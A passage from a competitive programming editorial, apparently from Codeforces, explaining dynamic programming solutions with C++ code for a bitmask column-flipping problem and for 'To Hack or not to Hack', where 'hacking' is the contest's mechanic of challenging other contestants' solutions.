; by expanding this inclusion-exclusion type argument, we get that the number of masks we are interested in can be expressed as dp[k - 1][next] - dp[k - 2][mask] + dp[k - 3][next] - dp[k - 4][mask] + dp[k - 5][next] - .... By summing all these expressions for each bit p from 0 to n, we get dp[k][mask] · k, since each column is counted in k times (for each of the bits p where the column differs from mask).
Therefore, we are now able to count the values of dp[k][mask] in time O(2n · n3) using the following recurrence:
This is still a tad slow, but we can speed it up to O(2n · n2), for example, in a following fashion:
BONUS Are you able to come up with an even faster solution?
#include<bits/stdc++.h> using namespace std; char s[100000]; int col[100000], dp[21][1 << 20]; int main() { int n, m; scanf("%d %d", &n, &m); for (int i = 0; i < n; i++) { scanf(" %s", s); for (int j = 0; j < m; j++) col[j] |= (s[j] - '0') << i; } for (int i = 0; i < m; i++) dp[0][col[i]]++; for (int k = 1; k <= n; k++) for (int mask = 0; mask < (1 << n); mask++) { int sum = k > 1 ? (k - 2 - n) * dp[k - 2][mask] : 0; for (int p = 0; p < n; p++) sum += dp[k - 1][mask ^ (1 << p)]; dp[k][mask] = sum / k; } int ans = n * m; for (int mask = 0; mask < (1 << n); mask++) { int cnt = 0; for (int k = 0; k <= n; k++) cnt += min(k, n - k) * dp[k][mask]; ans = min(ans, cnt); } printf("%d\\n", ans); return 0; }
662E - To Hack or not to Hack
Author of the idea — Alex_2oo8
Observation number one — as you are the only participant who is able to hack, the total score of any other participant cannot exceed 9000 (3 problems for 3000 points). Hence hacking at least 90 solutions automatically guarantees the first place (the hacks alone increase the score by 9000 points).
Now we are left with the problem where the number of hacks we make is at most 90. We can try each of the 63 possible score assignments for the problems in the end of the round. As we know the final score for each problem, we can calculate the maximum number of hacks we are allowed to make so the problem gets the assigned score. This is also the exact amount of hacks we will make in that problem. As we know the number of hacks we will make, we can calculate our final total score. Now there are at most 90 participants who we can possibly hack. We are interested only in those who are on top of us. By hacking we want to make their final score less than that of us. This problem can by solved by means of dynamic programming:
dp[p][i][j][k] — the maximum number of participants among the top p, whom we can push below us by hacking first problem i times, second problem j times and third problem k times.
The recurrence: we pick a subset of solutions of the current participant that we will hack, and if after these hacks we will push him below us, we update the corresponding dp state. For example, if it is enough to hack the first and the third problems, then dp[p + 1][i + 1][j][k + 1] = max(dp[p + 1][i + 1][j][k + 1], dp[p][i][j][k] + 1)
BONUS Can you solve this problem if each hack gives only 10 points, not 100?
#include<bits/stdc++.h> #define time ololo using namespace std; int time[5000][3], n, solved[3], canHack[3], score[3], willHack[3], bestPlace, dp[2][90][90][90], ci, li; int submissionScore(int sc, int tm) { if (tm == 0) return 0; return sc * (250 - abs(tm)) / 250; } int calcScore(int p) { int sum = 0; for (int i = 0; i < 3; i++) sum += submissionScore(score[i], time[p][i]); return sum; } int countHacks(int p) { int cnt = 0; for (int i = 0; i < 3; i++) cnt += time[p][i] < 0; return cnt; } int solve() { memset(dp, 0, sizeof dp); int myScore = 0; for (int i = 0; i < 3; i++) myScore += 100 * willHack[i] + submissionScore(score[i], time[0][i]); ci = 0; li = 1; for (int p = 1; p < n; p++) if (countHacks(p) > 0 && calcScore(p) > myScore) { ci ^= 1; li ^= 1; for (int i = 0; i <= willHack[0]; i++) for (int j = 0; j <= willHack[1]; j++) for (int k = 0; k <= willHack[2]; k++) dp[ci][i][j][k] = dp[li][i][j][k]; for (int ii = 0; ii < 2; ii++) for (int jj = 0; jj < 2; jj++) for (int kk = 0; kk < 2; kk++) { if (ii == 1 && time[p][0] >= 0) continue; if (jj == 1 && time[p][1] >= 0) continue; if (kk == 1 && time[p][2] >= 0) continue; int s = submissionScore(score[0], time[p][0]) * (ii ^ 1) + submissionScore(score[1], time[p][1]) * (jj ^ 1) + submissionScore(score[2], time[p][2]) * (kk ^ 1); if (s > myScore) continue; for (int i = ii; i <= willHack[0]; i++) for (int j = jj; j <= willHack[1]; j++) for (int k = kk; k <= willHack[2]; k++) dp[ci][i][j][k] = max(dp[ci][i][j][k], dp[li][i - ii][j - jj][k - kk] + 1); } } int res = 1 - dp[ci][willHack[0]][willHack[1]][willHack[2]]; for (int p = 1; p < n; p++) if (calcScore(p) > myScore) res++; return res; } void brute(int p) { if (p == 3) { int res = solve(); bestPlace = min(bestPlace, res); return; } for (int i = 0; i < 6; i++) { int mn = i == 5 ? 0 : (n >> (i + 1)) + 1; int mx = (n >> i); if (solved[p] >= mn && solved[p] - canHack[p] <= mx) { score[p] = 500 * (i + 1); willHack[p] = min(canHack[p], solved[p] - mn); brute(p + 1); } } } int main() { memset(solved, 0, sizeof solved); memset(canHack, 0, sizeof canHack); scanf("%d", &n); for (int i = 0; i < n; i++) for (int j = 0; j < 3; j++) { scanf("%d", &time[i][j]); solved[j] += time[i][j] != 0; canHack[j] += time[i][j] < 0; } if (canHack[0] + canHack[1] + canHack[2] > 89) { printf("1\\n"); return 0; } bestPlace = n; brute(0); printf("%d\\n", bestPlace); return 0; } | http://codeforces.com/blog/entry/44408 | CC-MAIN-2017-51 | refinedweb | 3,191 | 71.48 |
import "golang.org/x/exp/io/i2c/driver"
Package driver contains interfaces to be implemented by various I2C implementations.
type Conn interface { // Tx first writes w (if not nil), then reads len(r) // bytes from device into r (if not nil) in a single // I2C transaction. Tx(w, r []byte) error // Close closes the connection. Close() error }
Conn represents an active connection to an I2C device.
Opener opens a connection to an I2C device to communicate with the I2C address given. If the address is an 10-bit I2C address, tenbit is true.
Package driver is imported by 13 packages. Updated 2017-10-03. Refresh now. Tools for package owners. | https://godoc.org/golang.org/x/exp/io/i2c/driver | CC-MAIN-2017-43 | refinedweb | 110 | 58.89 |
My teammate came to me and asked, how to figure out the number of business days between two given dates? My immediate reply was, loop through start date to end date. But after some time, I realized that this solution is not optimized. So I started developing my own optimized algorithm.
In this article we will discuss the algorithm and see the implementation on SQL Server 2000 and also some C# code.
Let’s start with algorithms first. Here are the key factors that are involved in the calculation.
This depends on the company/country policies. In the US, it's generally 5 days per week, whereas in India and in many other countries, many companies work for 6 days a week. Our algorithm needs to take that into consideration.
The second factor is the number of holidays during a specified period. Again that depends on company policy. We can maintain these details in one table. That is simple too.
Simple enough hum…!!!
As we know the number of working days per week, and as the pattern repeats every week, first we will calculate the number of complete weeks. We should deduct one from the number of weeks. Once we get the number of weeks, we can then multiply by the number of working days and arrive at a rough number of business days.
OK, so we have a rough number of business days, say D. I am calling it ruff number as it is not the exact answer, as we have deducted one week in the first step.
Now, we will find out how many days are there in the starting week. For example if the starting day is Wednesday, the number of days in the starting week is 3 (if number of business days in a week is 5) or 4 (if number of business days in a week is 6).
Similarly, find out how many days are there in the last week. At last, find out how many holidays fall during that time span. That will be a simple aggregation query on the Holiday table.
Once we have all the numbers in hand, based on the mentioned expression, we can come up with our desired answer. Hope this clears all your doubts. So let’s start implementing this algorithm.
First, we will try to implement this on SQL Server using T-SQL.
SQL Server has a number of date functions, two of them are DATEDIFF and DATEPART. That will come handy in this implementation.
DATEDIFF
DATEPART
You can implement this algorithm as a procedure or a function. The preferred one is function but here I will implement this as a procedure so that we can use the print command. Once everything is OK, you can convert it to a procedure by just removing the print command and using return.
print
return
Create procedure SpBusinessDays (@dtStartDate datetime, @dtEndDate datetime,
@indDaysInWeek int)
as
begin
declare
@intWeeks int
,@indDays int
,@intSdays int
,@intEdays int
-- Find the number of weeks between the dates. Subtract 1
-- since we do not want to count the current week.
select @intWeeks = datediff( week, @dtStartDate, @dtEndDate) - 1
print 'week'
print @intWeeks
-- calculate the number of days in these compelete weeks.
select @indDays = @intWeeks * @indDaysInWeek
print 'Est. Days'
print @indDays
-- Get the number of days in the starting week.
if @indDaysInWeek = 5
-- If Saturday, Sunday is holiday
if datepart( dw, @dtStartDate) = 7
select @intSdays = 7 - datepart( dw, @dtStartDate)
else
select @intSdays = 7 - datepart( dw, @dtStartDate) - 1
else
-- If Sunday is only <st1:place>Holiday</st1:place>
select @intSdays = 7 - datepart( dw, @dtStartDate)
print 'Starting Days'
print @intSdays
-- Calculate the days in the last week.
if @indDaysInWeek = 5
if datepart( dw, @dtEndDate) = 7
select @intEdays = datepart( dw, @dtEndDate) - 2
else
select @intEdays = datepart( dw, @dtEndDate) - 1
else
select @intEdays = datepart( dw, @dtEndDate) - 1
print 'End Days'
print @intEdays
-- Sum everything together.
select @indDays = @indDays + @intSdays + @intEdays
print 'Ans'
print @indDays
end
Note: Starting date is Exclusive.
Here if you notice, if the number of working days is 6, we need not worry about any thing, we can simply count the days. If the number of working days is 5 then we have to take care of Saturday.
That’s it. It’s simple.
OK, but let’s say if you calculate this on your presentation layer, the stored procedure or “function” will not work. So now we will implement the same algorithm in C#.
Here is the implementation in C#:
/// <summary>
/// Calulates Business Days within the given range of days.
/// Start date and End date inclusive.
/// </summary>
/// <param name="startDate">Datetime object
/// containing Starting Date</param>
/// <param name="EndDate">Datetime object containing
/// End Date</param>
/// <param name="NoOfDayWeek">integer denoting No of Business
/// Day in a week</param>
/// <param name="DayType"> DayType=0 for Business Day and
/// DayType=1 for WeekEnds </param>
/// <returns></returns>
public static double CalculateBDay(
DateTime startDate,
DateTime EndDate,
int NoOfDayWeek, /* No of Working Day per week*/
int DayType
)
{
double iWeek, iDays, isDays, ieDays;
//* Find the number of weeks between the dates. Subtract 1 */
// since we do not want to count the current week. * /
iWeek =DateDiff("ww",startDate,EndDate)-1 ;
iDays = iWeek * NoOfDayWeek;
//
if( NoOfDayWeek == 5)
{
//-- If Saturday, Sunday is holiday
if ( startDate.DayOfWeek == DayOfWeek.Saturday )
isDays = 7 -(int) startDate.DayOfWeek;
else
isDays = 7 - (int)startDate.DayOfWeek - 1;
}
else
{
//-- If Sunday is only <st1:place>Holiday</st1:place>
isDays = 7 - (int)startDate.DayOfWeek;
}
//-- Calculate the days in the last week. These are not included in the
//-- week calculation. Since we are starting with the end date, we only
//-- remove the Sunday (datepart=1) from the number of days. If the end
//-- date is Saturday, correct for this.
if( NoOfDayWeek == 5)
{
if( EndDate.DayOfWeek == DayOfWeek.Saturday )
ieDays = (int)EndDate.DayOfWeek - 2;
else
ieDays = (int)EndDate.DayOfWeek - 1;
}
else
{
ieDays = (int)EndDate.DayOfWeek - 1 ;
}
//-- Sum everything together.
iDays = iDays + isDays + ieDays;
if(DayType ==0)
return iDays;
else
return T.Days - iDays;
}
DateDiff
While I was working on this issue, I also came across another issue with DateTime functions in C#. I came to know that C# does not have important functions like DateDiff, found in VB.NET. So I have included that in the same library. As Tim McCurdy said we can include Microsoft.VisualBasic.dll to our project and use DateDiff function implemented by the VB team, but I have noticed many people don't like the idea of mixing C# code with VB.NET code, though it is technically perfectly fine. Second problem with calculation of week, month or year is, they are not simple. You can not get the number of weeks = TimeSpan.Totaldays / 7. The rule says, number of week equals to number of time you cross the week boundary for given duration. To solve this problem I have added a new function called GetWeeks.
DateTime
TimeSpan.Totaldays
GetWeeks
/// <summary>
/// Calculate weeks between starting date and ending date
/// </summary>
/// <param name="stdate"></param>
/// <param name="eddate"></param>
/// <returns></returns>
public static int GetWeeks(DateTime stdate, DateTime eddate )
{
TimeSpan t= eddate - stdate;
int iDays;
if( t.Days < 7)
{
if(stdate.DayOfWeek > eddate.DayOfWeek)
return 1; //It is accross the week
else
return 0; // same week
}
else
{
iDays = t.Days -7 +(int) stdate.DayOfWeek ;
int i=0;
int k=0;
for(i=1;k<iDays ;i++)
{
k+=7;
}
if(i>1 && eddate.DayOfWeek != DayOfWeek.Sunday ) i-=1;
return i;
}
}
/// <summary>
/// Mimic the Implementation of DateDiff function of VB.Net.
/// Note : Number of Year/Month is calculated
/// as how many times you have crossed the boundry.
/// e.g. if you say starting date is 29/01/2005
/// and 01/02/2005 the year will be 0,month will be 1.
///
/// </summary>
/// <param name="datePart">specifies on which part
/// of the date to calculate the difference </param>
/// <param name="startDate">Datetime object containing
/// the beginning date for the calculation</param>
/// <param name="endDate">Datetime object containing
/// the ending date for the calculation</param>
/// <returns></returns>
public static double DateDiff(string datePart,
DateTime startDate, DateTime endDate)
{
//Get the difference in terms of TimeSpan
TimeSpan T;
T = endDate - startDate;
//Get the difference in terms of Month and Year.
int sMonth, eMonth, sYear, eYear;
sMonth = startDate.Month;
eMonth = endDate.Month;
sYear = startDate.Year;
eYear = endDate.Year;
double Months,Years=0;
Months = eMonth - sMonth;
Years = eYear - sYear;
Months = Months + ( Years*12);
switch(datePart.ToUpper())
{
case "WW":
case "DW":
return (double)GetWeeks(startDate,endDate);
case "MM":
return Months;
case "YY":
case "YYYY":
return Years;
case "QQ":
case "QQQQ":
//Difference in Terms of Quater
return Math.Ceiling((double)T.Days/90.0);
case "MI":
case "N":
return T.TotalMinutes ;
case "HH":
return T.TotalHours ;
case "SS":
return T.TotalSeconds;
case "MS":
return T.TotalMilliseconds;
case "DD":
default:
return T.Days;
}
}
This is a simple calculation compared to business days. I have added the function that can calculate the age on a specified date, in terms of year, month and days:
/// <summary>
/// Calculate Age on given date.
/// Calculates as Years, Months and Days.
/// </summary>
/// <param name="DOB">Datetime object
/// containing DOB value</param>
/// <param name="OnDate">Datetime object containing given
/// date, for which we need to calculate the age</param>
/// <returns></returns>
public static string Age(DateTime DOB, DateTime OnDate)
{
//Get the difference in terms of Month and Year.
int sMonth, eMonth, sYear, eYear;
double Months, Years;
sMonth = DOB.Month;
eMonth = OnDate.Month;
sYear = DOB.Year;
eYear = OnDate.Year;
// calculate Year
if( eMonth >= sMonth)
Years = eYear - sYear;
else
Years = eYear - sYear -1;
//calculate Months
if( eMonth >= sMonth)
Months = eMonth - sMonth;
else
if ( OnDate.Day > DOB.Day)
Months = (12-sMonth)+eMonth-1;
else
Months = (12-sMonth)+eMonth-2;
double tDays=0;
//calculate Days
if( eMonth != sMonth && OnDate.Day != DOB.Day )
{
if(OnDate.Day > DOB.Day)
tDays = DateTime.DaysInMonth(OnDate.Year,
OnDate.Month) - DOB.Day;
else
tDays = DateTime.DaysInMonth(OnDate.Year,
OnDate.Month-1) - DOB.Day + OnDate.Day ;
}
string strAge = Years+"/"+Months+"/"+tDays;
return strAge;
}
If you notice the algorithm, I have talked about holidays too, but I have not implemented this in any of the above code but that can be taken care of by a simple query. So I am leaving that up to you. Do let me know if you like this code, or if it was useful in your project. You can mail me at Gaurang.Desai@gmail.com.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
public static int GetFullWorkingDaysBetween(DateTime firstDate, DateTime lastDate, IEnumerable<DateTime> holidays)
{
if (firstDate > lastDate)// Swap the dates if firstDate > lastDate
{
DateTime tempDate = firstDate;
firstDate = lastDate;
lastDate = tempDate;
}
int days = (int)(lastDate.Subtract(firstDate).Ticks / TimeSpan.TicksPerDay);
int weekReminder = days % 7;
if (weekReminder > 0)
{
switch (firstDate.DayOfWeek)
{
case DayOfWeek.Monday:
days = days - ((weekReminder > 5) ? 1 : 0);
// Another way for this:
//days = days - ((int)weekReminder % 5);
// but i think its more expensive
break;
case DayOfWeek.Tuesday:
days = days - ((weekReminder > 4) ? 1 : 0) - ((weekReminder > 5) ? 1 : 0);
// The same from above
//days = days - ((int)weekReminder % 4);
break;
case DayOfWeek.Wednesday:
days = days - ((weekReminder > 3) ? 1 : 0) - ((weekReminder > 4) ? 1 : 0);
break;
case DayOfWeek.Thursday:
days = days - ((weekReminder > 2) ? 1 : 0) - ((weekReminder > 3) ? 1 : 0);
break;
case DayOfWeek.Friday:
days = days - ((weekReminder > 1) ? 1 : 0) - ((weekReminder > 2) ? 1 : 0);
break;
case DayOfWeek.Saturday:
days = days - 1 - ((weekReminder > 1) ? 1 : 0);
break;
case DayOfWeek.Sunday:
days = days - 1;
break;
}
}
days = days - (2 * ((int)days / 7));
if (holidays != null && holidays.Count() > 0)
{
foreach (DateTime holiday in holidays.Where(h => h >= firstDate && h < lastDate))
{
DayOfWeek dayOfWeekOfHoliday = holiday.DayOfWeek;
if (dayOfWeekOfHoliday != DayOfWeek.Saturday && dayOfWeekOfHoliday != DayOfWeek.Sunday)
{
days = days - 1;
}
}
}
return days;
}
DateTime dtDate = DateTime.Parse("07/01/2005"); // Date
TimeSpan tSpan = new TimeSpan(14,0,0,0); // 1 Week
// Display the Date for 1 Week ago
System.Diagnostics.Trace.WriteLine(dtDate.Subtract(tSpan));
// Display the Date for 1 Week in the future
System.Diagnostics.Trace.WriteLine(dtDate.Add(tSpan));
DateTime dtStart = DateTime.Today;
DateTime dtEnd = DateTime.Now;
TimeSpan tSpan = dtEnd.Subtract(dtStart);
System.Diagnostics.Trace.WriteLine("Duration: " + tSpan.ToString());
System.Diagnostics.Trace.WriteLine("Total Weeks: " + (tSpan.TotalDays / 7));
System.Diagnostics.Trace.WriteLine("Total Days: " + tSpan.TotalDays);
System.Diagnostics.Trace.WriteLine("Total Hours: " + tSpan.TotalHours);
System.Diagnostics.Trace.WriteLine("Total Minutes: " + tSpan.TotalMinutes);
Microsoft.VisualBasic
long nValue = Microsoft.VisualBasic.DateAndTime.DateDiff(
Microsoft.VisualBasic.DateInterval.WeekOfYear,
dtStart, dtEnd,
Microsoft.VisualBasic.FirstDayOfWeek.Sunday,
Microsoft.VisualBasic.FirstWeekOfYear.Jan1);
System.Diagnostics.Trace.WriteLine("Week No: " + nValue);
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/articles/10641/optimized-calculation-algorithm-for-business-days?msg=2838398 | CC-MAIN-2017-13 | refinedweb | 2,106 | 58.89 |
On Wed, 5 May 1999, Vlad Harchev wrote: >[...] Here is a small patch (that should be applied after one sent recently), that will make entire functionality turnable on/off by macro NO_EXT_LYNXCFG. So if lynx-developers fear to include this functionality unconditionally, it can be declared 'experimental feature'. As for *.htmls, I think they should be installed unconditionally (but we can make makefile target that will remove them from $(helpdir) - like '-rm -rf %(helpdir)/lynxcfg'). Best regards, -Vlad --- LYReadCFG.c~ Wed May 5 19:51:33 1999 +++ LYReadCFG.c Thu May 6 01:34:07 1999 @@ -32,6 +32,9 @@ #ifndef NO_EXT_LYNXCFG # define EXT_LYNXCFG +# define INCLUDE_OPTDOC_HREF /*undef this if you don't wish links to + documentation on the settings showed in the LYNXCFG:// page. This macro can + be defined even if NO_EXT_LYNXCFG is defined. */ #endif #ifdef EXT_LYNXCFG | http://lists.gnu.org/archive/html/lynx-dev/1999-05/msg00336.html | CC-MAIN-2016-07 | refinedweb | 137 | 57.37 |
In this section, you will learn how to get the name of the file.
Description of code:
You can see in the given example, we have created an object of File class and specified a file in the constructor. Then we have called the method getName() through the object of File class which returns the name of the file.
Here is the code:
import java.io.*; public class FileGetName { public static void main(String[] args) { File file = new File("C:/Answers/File/out.txt"); String st = file.getName(); System.out.println("File name is: " + st); } }
Through the method getName() of File class, you can get the name of any file.
Output:
Advertisements
Posted on: April | http://www.roseindia.net/tutorial/java/core/files/filegetname.html | CC-MAIN-2016-44 | refinedweb | 115 | 75.2 |
React + Redux — Best Practices
This article mainly focuses on implementing some good practices I follow when building large scale applications with React and Redux.
Differentiate Presentational Components and Container Components.
When we are architecting a react application with redux, we should split our components into presentational and container components.
Presentational components are components that render HTML. All our presentational components are stateless components, so are written as functional stateless components unless they need state and lifecycle hooks. Presentational components will not interact with redux store for state. They receive data via props and render it.
Container components are for getting data from redux store and providing the data to the presentational components. They tend to be stateful.
Presentational Component should be stateless functional component as shown:
Container Component should be stateful functional component until unless you are forced to use React component life cycle methods.
Points to be noted:
- We can see improved performance when using stateless functional components.These components avoid unnecessary checks and memory allocations and are therefore more performant.
- It will be easy to test a component , if you write the component as simple as possible by splitting presentational components and container components.
Use bindActionCreators for dispatching actions
Redux’s event dispatching system is the heart of its state management functionality. However, it can be tedious to pass down the dispatch function as a prop to every component that needs to dispatch an action.
Avoid this.
Avoid this.
Instead do this.
In the above code filterTalentPoolDataBySkills in bindActionCreators is available as this.props.filterTalentPoolDataBySkills to dispatch your action. It will make it easier to maintain the code for long run.
Try to avoid using setState and component lifecycle hooks when using Redux:
Manage the application state using redux store when it is global state. Try to avoid using setState in your component when you are using state management libraries like redux. Use component state when it makes sense ie. A Button component that shows a tooltip when hovered would not use Redux.
Avoid Doing this.
Instead do this.
Here we used the redux store to get state and render it in the view directly. There is no need of using setState and component lifecycle hooks again. Redux is there to do the state management job for you.
Using .bind() in best way:
There are two ways of binding the custom component’s this scope.
- Binding them in constructor.
With this way only one extra function is created at the time of component creation, and that function is used even when render is executed again.
2. Binding at the time of passing as prop value.
.bind() method creates a new function each time it is run, this method would lead to a new function being created every time when the render function executes. This has some performance implications. In small applications we cannot notice them, where as in large applications we can notice them. So its not prefferable to bind a function at the time of passing as a prop value.
Solution:
- Its better to bind your custom functions in constructor.
- There is a Babel plugin called Class properties transform . You can write auto-bound function using the fat-arrow syntax.
If we see the above code there are no functions to bind.
Use Accessor Functions
For better code refactoring move all your functions which do filtering , parsing and other data transformation logics into seperate file and import them to use those functions inside your connect method of react-redux as shown.
By doing this it will be easy to add flow types for your functions.
Write cleaner code using ES6 Features
Writing cleaner code will make the developers life easy to understand and maintain the code. ES6 features will give us much cleaner way of writing code in React.
Use Destructuring & spread attributes:
Avoid this.
Instead do this.
Use Arrow functions:
Avoid this:
Instead do this.
Use Flow Types
One thing is certain that type checking is expected to be the future of JS. Generally many developers have a confusion between what to implement between flow and typescript and how smoothly they can be integrated into a current project.
Typescript is more sophisticated to integrate into current project and flow feels simple to introduce, admitting with a warning that it might be inspecting less of your coding as expected.
As the javascript project grows without typing, the more difficult refactoring will become. The larger the project the higher the risk when refactoring. Using type checking may not completely eliminate risk but it will greatly reduce it.
Benifits in using flow:
- On time detection of bugs or errors.
- Communicates the purpose of the function.
- It Scales Down Complex Error Handling.
- Wipes Out Runtime Type Errors.
Use axios library for http requests over jQuery ajax:
Fetch API and axios are the most preferable ways of making http requests. Between those two there are some advantages of using axios library. They are
- It allows performing transforms on data before request is made or after response is received.
- It allows you to alter the request or response entirely (headers as well). also perform async operations before request is made or before Promise settles.
- Built-in XSRF protection.
Use styled-components to style your components
The basic idea of styled-components is to enforce best practices by removing the mapping between styles and components. This way, you can colocate your components with their corresponding styles — resulting in localised class names that do not pollute the global css namespace.
If you decide to use styled-components, do not forget to install plugin to support syntax highlighting in strings or maybe help creating a new one.
Example:
Test your React components
The goal of unit testing is to segregate each part of the program and test that the individual parts are working correctly. It isolates the smallest piece of testable software from the remainder of the code and determines whether it behaves exactly as you expect. We can find bugs in early stage.
In React to test component we use Jest and Enzyme. Jest was created by Facebook and is a testing framework to test javascript and React code. Together with Airbnb’s Enzyme, which is a testing utility, makes it the perfect match to easily test your React application.
Use ES Lint for better coding conventions.
Well run projects have clear consistent coding conventions, with automated enforcement. Besides checking style, linters are also excellent tools for finding certain classes of bugs, such as those related to variable scope. Assignment to undeclared variables and use of undefined variables are examples of errors that are detectable at lint time.
For React specific linting rules go with esint-plugin-react .
For linting flow types rules go with eslint-plugin-flowtype and eslint-plugin-flowtype-errors. | http://brianyang.com/react-redux-best-practices/ | CC-MAIN-2018-22 | refinedweb | 1,129 | 57.06 |
There are places in the standard that give rules for C and not for C++. In these cases, the C rule should be applied to the C++ case, as appropriate. In particular, the values of constants given in the text are the ones for C and Fortran. A cross index of these with the C++ names is given in Annex Language Binding .
We use the ANSI C++ declaration format. All MPI names are declared within the scope of a namespace called MPI and therefore are referenced with an MPI:: prefix. Defined constants are in all capital letters, and class names, defined types, and functions have only their first letter capitalized. Programs must not declare variables or functions in the MPI namespace. This is mandated to avoid possible name collisions.
The definition of named constants, function prototypes, and type definitions must be supplied in an include file mpi.h.
Advice to implementors.
The file mpi.h may contain both the C and C++ definitions.
Usually one can simply use the defined value (generally __cplusplus,
but not required) to see if one is using
C++ to protect the C++ definitions. It is possible that a C compiler
will require that the source protected this way be legal C code. In
this case, all the C++ definitions can be placed in a different
include file and the ``#include'' directive can be used to include the
necessary C++ definitions in the mpi.h file.
( End of advice to implementors.)
C++ functions that create objects or return information usually place the object or information in the return value. Since the language neutral prototypes of MPI functions include the C++ return value as an OUT parameter, semantic descriptions of MPI functions refer to the C++ return value by that parameter name (see Section Function Name Cross Reference ). The remaining C++ functions return void.
In some circumstances, MPI permits users to indicate that they do not want a return value. For example, the user may indicate that the status is not filled in. Unlike C and Fortran where this is achieved through a special input value, in C++ this is done by having two bindings where one has the optional argument and one does not.
C++ functions do not return error codes. If the default error handler has been set to MPI::ERRORS_THROW_EXCEPTIONS, the C++ exception mechanism is used to signal an error by throwing an MPI::Exception object.
It should be noted that the default error handler (i.e., MPI::ERRORS_ARE_FATAL) on a given type has not changed. User error handlers are also permitted. MPI::ERRORS_RETURN simply returns control to the calling function; there is no provision for the user to retrieve the error code.
User callback functions that return integer error codes should not throw exceptions; the returned error will be handled by the MPI implementation by invoking the appropriate error handler.
Advice to users.
C++ programmers that want to handle MPI errors on their own should
use the MPI::ERRORS_THROW_EXCEPTIONS error handler, rather
than MPI::ERRORS_RETURN, that is used for that purpose in
C. Care should be taken using exceptions in mixed language
situations.
( End of advice to users.)
Opaque object handles must be objects in themselves, and have the assignment and equality operators overridden to perform semantically like their C and Fortran counterparts.
Array arguments are indexed from zero.
Logical flags are of type bool.
Choice arguments are pointers of type void *.
Address arguments are of MPI-defined integer type MPI::Aint, defined to be an integer of the size needed to hold any valid address on the target architecture. Analogously, MPI::Offset is an integer to hold file offsets.
Most MPI functions are methods of MPI C++ classes. MPI class names are generated from the language neutral MPI types by dropping the MPI_ prefix and scoping the type within the MPI namespace. For example, MPI_DATATYPE becomes MPI::Datatype.
The names of MPI-2 functions generally follow the naming rules given. In some circumstances, the new MPI-2 function is related to an MPI-1 function with a name that does not follow the naming conventions. In this circumstance, the language neutral name is in analogy to the MPI-1 name even though this gives an MPI-2 name that violates the naming conventions. The C and Fortran names are the same as the language neutral name in this case. However, the C++ names for MPI-1 do reflect the naming rules and can differ from the C and Fortran names. Thus, the analogous name in C++ to the MPI-1 name is different than the language neutral name. This results in the C++ name differing from the language neutral name. An example of this is the language neutral name of MPI_FINALIZED and a C++ name of MPI::Is_finalized.
In C++, function typedefs are made publicly within appropriate classes. However, these declarations then become somewhat cumbersome, as with the following:
typedef MPI::Grequest::Query_function();
would look like the following:
namespace MPI { class Request { // ... }; class Grequest : public MPI::Request { // ... typedef Query_function(void* extra_state, MPI::Status& status); }; };Rather than including this scaffolding when declaring C++ typedefs, we use an abbreviated form. In particular, we explicitly indicate the class and namespace scope for the typedef of the function. Thus, the example above is shown in the text as follows:
typedef int MPI::Grequest::Query_function(void* extra_state, MPI::Status& status)
The C++ bindings presented in Annex MPI-1 C++ Language Binding and throughout this document were generated by applying a simple set of name generation rules to the MPI function specifications. While these guidelines may be sufficient in most cases, they may not be suitable for all situations. In cases of ambiguity or where a specific semantic statement is desired, these guidelines may be superseded as the situation dictates.
2. Arrays of MPI handles are always left in the argument list (whether they are IN or OUT arguments).
3. If the argument list of an MPI function contains a scalar IN handle, and it makes sense to define the function as a method of the object corresponding to that handle, the function is made a member function of the corresponding MPI class. The member functions are named according to the corresponding MPI function name, but without the `` MPI_'' prefix and without the object name prefix (if applicable). In addition:
2. The function is declared const.
5. If the argument list contains a single OUT argument that is not of type MPI_STATUS (or an array), that argument is dropped from the list and the function returns that value.
Example The C++ binding for MPI_COMM_SIZE is int MPI::Comm::Get_size(void) const.
6. If there are multiple OUT arguments in the argument list, one is chosen as the return value and is removed from the list.
7. If the argument list does not contain any OUT arguments, the function returns void.
Example The C++ binding for MPI_REQUEST_FREE is void MPI::Request::Free(void)
8. MPI functions to which the above rules do not apply are not members of any class, but are defined in the MPI namespace.
Example The C++ binding for MPI_BUFFER_ATTACH is void MPI::Attach_buffer(void* buffer, int size).
9. All class names, defined types, and function names have only their first letter capitalized. Defined constants are in all capital letters.
10. Any IN pointer, reference, or array argument must be declared const.
11. Handles are passed by reference.
12. Array arguments are denoted with square brackets ( []), not pointers, as this is more semantically precise. | http://www.mcs.anl.gov/research/projects/mpi/mpi-standard/mpi-report-2.0/node21.htm | CC-MAIN-2014-42 | refinedweb | 1,248 | 55.34 |
undefined symbol: wl_proxy_marshal_constructor_versioned
When I write
import cv2
I get this error
ImportError: /lib/x86_64-linux-gnu/libgdk-3.so.0: undefined symbol: wl_proxy_marshal_constructor_versioned
I use Ubuntu 19.04
How can I resolve this?
opencv version ? how did you install that ? from where ? from src ?
I used this guide-...
@alon3. What command did you install libgdk?
@supra56 sudo apt-get install libgdk-pixbuf2.0-dev
Here is link: libgdk3.0-0
You suppose to install first
libgtk-3-0then you will
libgdk-pixbuf2.0
@supra56 I write sudo apt-get install libgtk-3-0 and then sudo apt-get install libgdk-pixbuf2.0 but it didnt resolve the problem | https://answers.opencv.org/question/219187/undefined-symbol-wl_proxy_marshal_constructor_versioned/ | CC-MAIN-2021-10 | refinedweb | 109 | 63.66 |
whatever 0.4.1
Easy way to make anonymous functions by partial application of operators.
An easy way to make lambdas by partial application of python operators.
Inspired by Perl 6 one, see
Usage
from whatever import _, that # get a list of guys names names = map(_.name, guys) names = map(that.name, guys) odd = map(_ * 2 + 1, range(10)) squares = map(_ ** 2, range(100)) small_squares = filter(_ < 100, squares) best = max(tries, key=_.score) sort(guys, key=-that.height) factorial = lambda n: reduce(_ * _, range(2, n+1))
NOTE: chained comparisons cannot be implemented since there is no boolean overloading in python.
CAVEATS
In some special cases whatever can cause confusion:
_.attr # this makes callable obj._ # this fetches '_' attribute of obj _[key] # this works too d[_] # KeyError, most probably _._ # short for attrgetter('_') _[_] # short for lambda d, k: d[k] if _ == 'Any value': # You will get here, definitely # `_ == something` produces callable, which is true [1, 2, _ * 2, None].index('hi') # => 2, since bool(_ * 2 == 'hi') is True
Also, whatever sometimes fails on late binding:
(_ * 2)('2') # -> NotImplemented
